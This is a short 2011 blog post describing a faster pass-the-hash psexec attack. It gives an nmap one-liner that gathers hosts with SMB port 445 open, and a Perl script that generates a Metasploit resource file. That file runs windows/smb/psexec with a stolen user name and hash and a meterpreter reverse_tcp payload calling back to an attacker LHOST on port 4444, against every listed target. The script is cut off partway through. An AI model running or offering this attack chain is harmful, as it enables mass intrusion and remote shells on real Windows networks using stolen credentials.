Tuesday, October 4, 2011

A Faster psexec Attack

So, I got some pretty harsh feedback from my first blog post. "You really suck at scripting", they said. "You're a script-kiddie's script-kiddie!", they yelled. "What if I wanted to pass a list of IPs, smart boy? How would you do that?" I tried not to get defensive and replied, "Jeez Mom, relax, I'll come up a solution."

I've been using a perl script that lets me pass-the-hash against all IPs in a subnet range but I updated it to set the rhosts from a file instead. That way once I get a hash I want to try, I can nmap the environment and collect targets with just SMB ports to pass to the attack.

Start by pulling together the targets using nmap and the unix cut command:
nmap -p445 -Pn -oG - | grep 445/open | cut -d' ' -f2 >> smb.txt

Then create the perl file that can be compiled into an MSF resource file.
#!/usr/bin/perl -w
use strict;

my $input_file="smb.txt";
print "use windows/smb/psexec\n";
print "set SMBUser NAME\n";
print "set SMBPass HASH\n";
print "set PAYLOAD windows/meterpreter/reverse_tcp\n";
print "set LHOST XXX.XXX.XXX.XXX\n";
print "set LPORT 4444\n";

 open(IN, $input_file) or die "$input_file\n";
    while(<IN>) {
        print "set RHOST $_\n";
        print "exploit\n";
        print "sleep 2\n";

No comments:

Post a Comment

Thanks for adding to the conversation. I'll update your post shortly.